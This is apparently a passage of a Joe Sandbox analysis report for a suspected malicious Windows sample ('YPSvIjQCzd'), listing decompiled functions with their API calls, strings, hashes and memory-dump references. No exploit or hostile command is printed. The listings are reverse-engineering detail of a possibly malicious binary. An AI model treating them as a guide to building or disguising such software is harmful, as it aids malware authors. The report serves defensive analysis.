Opcode ID: 8785c47b47a25f78fa202eab1aeab957581cc4043387ca02c42f00778ed328c1
Instruction ID: 4eee71b25b7d93795a0388b0e4737101a29e43da64ec650b7ab2c4fbd852deee
Opcode Fuzzy Hash: 8785c47b47a25f78fa202eab1aeab957581cc4043387ca02c42f00778ed328c1
Instruction Fuzzy Hash: C7510C60A0478819FF34DBA488657EABFB4FF91380F084599C5C2D61C2EA549A4CCFD6

Function 0082C72A Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 0082C746
GetWindowRect.USER32(00000000,?), ref: 0082C758
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0082C7B6
GetDlgItem.USER32(?,00000002), ref: 0082C7C1
GetWindowRect.USER32(00000000,?), ref: 0082C7D3
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0082C827
GetDlgItem.USER32(?,000003E9), ref: 0082C835
GetWindowRect.USER32(00000000,?), ref: 0082C846
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0082C889
GetDlgItem.USER32(?,000003EA), ref: 0082C897
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0082C8B4
InvalidateRect.USER32(?,00000000,00000001), ref: 0082C8C1

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 98a4a8a1a3fec34306aa57847b99cb020c74040d6d7508603c273c54652558ea
Instruction ID: fab92e021184b1c9f1fae73841d7c0e67448bc4d423fee3265b880bcf7b1adbb
Opcode Fuzzy Hash: 98a4a8a1a3fec34306aa57847b99cb020c74040d6d7508603c273c54652558ea
Instruction Fuzzy Hash: 51514C71B00205AFDB18CFA9DD89AAEBBBAFB98311F14813DF616D7291D7709D408B10

Function 007D21A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 007D25DB: GetWindowLongW.USER32(?,000000EB), ref: 007D25EC

GetSysColor.USER32(0000000F), ref: 007D21D3

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 8c3855cc5154c67f86472c503cb32e26c7beaab9fa9161a0502f9b9e22a092e5
Instruction ID: d997b59928c530193f10499820f9e9edbcb8b406663e6abe18f1cf2093f95a5c
Opcode Fuzzy Hash: 8c3855cc5154c67f86472c503cb32e26c7beaab9fa9161a0502f9b9e22a092e5
Instruction Fuzzy Hash: 24417D31104640ABDB225F289C48BB93B75FB16332F194266FE658A2E3D7399C43DB61

Function 0083AB12 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,0085F910), ref: 0083AB76
GetDriveTypeW.KERNEL32(00000061,0088A620,00000061), ref: 0083AC40
_wcscpy.LIBCMT ref: 0083AC6A

Strings

ramdisk, xrefs: 0083ABEA
all, xrefs: 0083AB7C
unknown, xrefs: 0083AC01
fixed, xrefs: 0083ABBE
removable, xrefs: 0083ABA8
cdrom, xrefs: 0083AB92
network, xrefs: 0083ABD4

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: 4857f8d9c6eb658759763b192fc6756d0fa2ed25d7a1e14186de715179ad1b06
Instruction ID: c4f8e963c41a1696bbc28bddb0278a1f717165911f894de5e33b8bdc4737e26f
Opcode Fuzzy Hash: 4857f8d9c6eb658759763b192fc6756d0fa2ed25d7a1e14186de715179ad1b06
Instruction Fuzzy Hash: E851AE30108305DBC728EF14C885AAAB7A5FF91314F10482EF6D6973A2DB35D94ACB93

Function 007D9997 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 007D99C2
__swprintf.LIBCMT ref: 007D9A0C
__i64tow.LIBCMT ref: 0080FA0F

Strings

0x%p, xrefs: 0080F9F1
%.15g, xrefs: 007D9A06
False, xrefs: 0080F9D7
True, xrefs: 0080F9D0

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: 4961bbd079f4f44338e71e4b6006586f945457a04022880985693c8c610dde94
Instruction ID: 94ec5fbd347147607167c49c0334820297b9789887b853a7c92da78c6ce05ff9
Opcode Fuzzy Hash: 4961bbd079f4f44338e71e4b6006586f945457a04022880985693c8c610dde94
Instruction Fuzzy Hash: BF41B371604209EFDB34AB28DC46E7677F8FB44300F20846FE749D6392EA79A941CB11

Function 008573C1 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 008573D9
CreateMenu.USER32 ref: 008573F4
SetMenu.USER32(?,00000000), ref: 00857403
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00857490
IsMenu.USER32(?), ref: 008574A6
CreatePopupMenu.USER32 ref: 008574B0
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 008574DD
DrawMenuBar.USER32 ref: 008574E5

Strings

0, xrefs: 008573CF
F, xrefs: 008574D1

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: 71d3d586ef0d7af9c0562a0a9ac029427d04aa980a8f9861474699db8e16db32
Instruction ID: 0a3cd420ff9918778510ed8672b1be29e182abd9548422c42dd9a7e9d70ad167
Opcode Fuzzy Hash: 71d3d586ef0d7af9c0562a0a9ac029427d04aa980a8f9861474699db8e16db32
Instruction Fuzzy Hash: 6C416874A00249EFDB10DF64E884E9ABBB5FF49342F144029FE05E7361E734A924CB54

Function 0085772A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 008577CD
CreateCompatibleDC.GDI32(00000000), ref: 008577D4
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 008577E7
SelectObject.GDI32(00000000,00000000), ref: 008577EF
GetPixel.GDI32(00000000,00000000,00000000), ref: 008577FA
DeleteDC.GDI32(00000000), ref: 00857803
GetWindowLongW.USER32(?,000000EC), ref: 0085780D
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00857821
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0085782D

Strings

static, xrefs: 00857765

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: bdf545e0108a75bd6c64558cd0e677d570586b3bc93326ee41076b0f6d374f28
Instruction ID: 13cc9a68a4a2b43047b97164948052165586373702a0a2f5abc37a1906144f04
Opcode Fuzzy Hash: bdf545e0108a75bd6c64558cd0e677d570586b3bc93326ee41076b0f6d374f28
Instruction Fuzzy Hash: F2317832105215ABDF129FA4EC08FDA3BA9FF0D322F104225FA15E61A1D7359825DBA4

Function 007F7040 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007F707B

Part of subcall function 007F8D68: __getptd_noexit.LIBCMT ref: 007F8D68

__gmtime64_s.LIBCMT ref: 007F7114
__gmtime64_s.LIBCMT ref: 007F714A
__gmtime64_s.LIBCMT ref: 007F7167
__allrem.LIBCMT ref: 007F71BD
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007F71D9
__allrem.LIBCMT ref: 007F71F0
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007F720E
__allrem.LIBCMT ref: 007F7225
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007F7243
__invoke_watson.LIBCMT ref: 007F72B4

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
Instruction ID: 2f04ad0b30fd94ed01dc5088068b80fe8097fd7a0ae6a28b2de96f7ce02c8f1c
Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
Instruction Fuzzy Hash: 43719371A0471AEBE7189E79CC41B7AB3B8BF55320F14822AF614D63C1EB78DA50C791

Function 00832A16 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00832A31
GetMenuItemInfoW.USER32(00896890,000000FF,00000000,00000030), ref: 00832A92
SetMenuItemInfoW.USER32(00896890,00000004,00000000,00000030), ref: 00832AC8
Sleep.KERNEL32(000001F4), ref: 00832ADA
GetMenuItemCount.USER32(?), ref: 00832B1E
GetMenuItemID.USER32(?,00000000), ref: 00832B3A
GetMenuItemID.USER32(?,-00000001), ref: 00832B64
GetMenuItemID.USER32(?,?), ref: 00832BA9
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00832BEF
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00832C03
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00832C24

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: cab42112a922fd5cc87bd43ce9e4316863d79b36238cfb5b08f08916e8f81740
Instruction ID: a2cb1ea40e934bad2e9d63ecab8461d6b1d7c681124be01fe282d92ac2f708e1
Opcode Fuzzy Hash: cab42112a922fd5cc87bd43ce9e4316863d79b36238cfb5b08f08916e8f81740
Instruction Fuzzy Hash: 3D61BFB0900249EFDF21DFA4D888EBEBBB8FB80314F140459E941E7251E735AD16DBA1

Function 00857192 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00857214
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00857217
GetWindowLongW.USER32(?,000000F0), ref: 0085723B
_memset.LIBCMT ref: 0085724C
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0085725E
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 008572D6

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: c7dd6b30c5db39e265391543eea105579a0d42e2723df7c2ccc138afe377c6fc
Instruction ID: 36acb2b81a0ee21e8599c39165675b8e3270428d7d14661f6ca2737492d8cfce
Opcode Fuzzy Hash: c7dd6b30c5db39e265391543eea105579a0d42e2723df7c2ccc138afe377c6fc
Instruction Fuzzy Hash: DD614771900208ABDB10DFA4DC81EEE77B8FB09714F14416AFE14E73A1D774AA59DB60

Function 0082710E Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00827135
SafeArrayAllocData.OLEAUT32(?), ref: 0082718E
VariantInit.OLEAUT32(?), ref: 008271A0
SafeArrayAccessData.OLEAUT32(?,?), ref: 008271C0
VariantCopy.OLEAUT32(?,?), ref: 00827213
SafeArrayUnaccessData.OLEAUT32(?), ref: 00827227
VariantClear.OLEAUT32(?), ref: 0082723C
SafeArrayDestroyData.OLEAUT32(?), ref: 00827249
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00827252
VariantClear.OLEAUT32(?), ref: 00827264
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0082726F

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 2934c24bee459ae7e47c09a4b3b13fb2f30e2f3d585f714fdbd4e23c0cf7b50a
Instruction ID: 358705eca70cbacd227d60f92cb7eac710020c6ae064039f5deefbc520838e16
Opcode Fuzzy Hash: 2934c24bee459ae7e47c09a4b3b13fb2f30e2f3d585f714fdbd4e23c0cf7b50a
Instruction Fuzzy Hash: 43415435900229EFCF00EF69D848DAEBBB9FF48355F008065FA56E7261DB34A945CB90

Function 00845A45 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000101,?), ref: 00845AA6
inet_addr.WS2_32(?), ref: 00845AEB
gethostbyname.WS2_32(?), ref: 00845AF7
IcmpCreateFile.IPHLPAPI ref: 00845B05
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00845B75
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00845B8B
IcmpCloseHandle.IPHLPAPI(00000000), ref: 00845C00
WSACleanup.WS2_32 ref: 00845C06

Strings

Ping, xrefs: 00845B29

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: ba32813b98f558764f24b2295fcacf00c6889a394950d2e7844d8b903c29940d
Instruction ID: 0101fed5f7175627b3be9ac92a751c15491e2e66dc62a76a51f86cd5a99034cd
Opcode Fuzzy Hash: ba32813b98f558764f24b2295fcacf00c6889a394950d2e7844d8b903c29940d
Instruction Fuzzy Hash: C1516C316047149FD711AF24CC49B2EBBE4FF48724F14892AF656DB2A2DB74E8408B52

Function 0083B72E Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0083B73B
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0083B7B1
GetLastError.KERNEL32 ref: 0083B7BB
SetErrorMode.KERNEL32(00000000,READY), ref: 0083B828

Strings

INVALID, xrefs: 0083B7FA
READONLY, xrefs: 0083B7F3
READY, xrefs: 0083B801
NOTREADY, xrefs: 0083B7E7
UNKNOWN, xrefs: 0083B7E0

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 7d0b646bc681fc42c8f93903103b54d1e53799ea3b9b3ca3f6f32adce9900dce
Instruction ID: d7abaf10cb1e200cf308b3b10f9524f430a18d87abebe6da8fd7254608328aeb
Opcode Fuzzy Hash: 7d0b646bc681fc42c8f93903103b54d1e53799ea3b9b3ca3f6f32adce9900dce
Instruction Fuzzy Hash: B0319475A40209EFDB04EF64C889AAE7BB4FF84744F10402AE601D7391DB759D42C791

Function 00829471 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 007D7F41: _memmove.LIBCMT ref: 007D7F82

Part of subcall function 0082B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0082B0E7

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 008294F6
GetDlgCtrlID.USER32 ref: 00829501
GetParent.USER32 ref: 0082951D
SendMessageW.USER32(00000000,?,00000111,?), ref: 00829520
GetDlgCtrlID.USER32(?), ref: 00829529
GetParent.USER32(?), ref: 00829545
SendMessageW.USER32(00000000,?,?,00000111), ref: 00829548

Strings

ListBox, xrefs: 008294B3
ComboBox, xrefs: 0082947E

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: b3d71796715feef53d7587e251750749a7ef5fa2f46c64a5f0a15aedcbb877fe
Instruction ID: 7fd1793ea50763533c07991276fe99be9a4afa59f10c718e8a7aa8ff96f8d718
Opcode Fuzzy Hash: b3d71796715feef53d7587e251750749a7ef5fa2f46c64a5f0a15aedcbb877fe
Instruction Fuzzy Hash: 0F21D670A00214BBCF05AB64DC85EFEBBB4FF55300F104116FA61972E2EB795959DB20

Function 0082955C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 007D7F41: _memmove.LIBCMT ref: 007D7F82

Part of subcall function 0082B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0082B0E7

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 008295DF
GetDlgCtrlID.USER32 ref: 008295EA
GetParent.USER32 ref: 00829606
SendMessageW.USER32(00000000,?,00000111,?), ref: 00829609
GetDlgCtrlID.USER32(?), ref: 00829612
GetParent.USER32(?), ref: 0082962E
SendMessageW.USER32(00000000,?,?,00000111), ref: 00829631

Strings

ListBox, xrefs: 0082959E
ComboBox, xrefs: 00829569

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
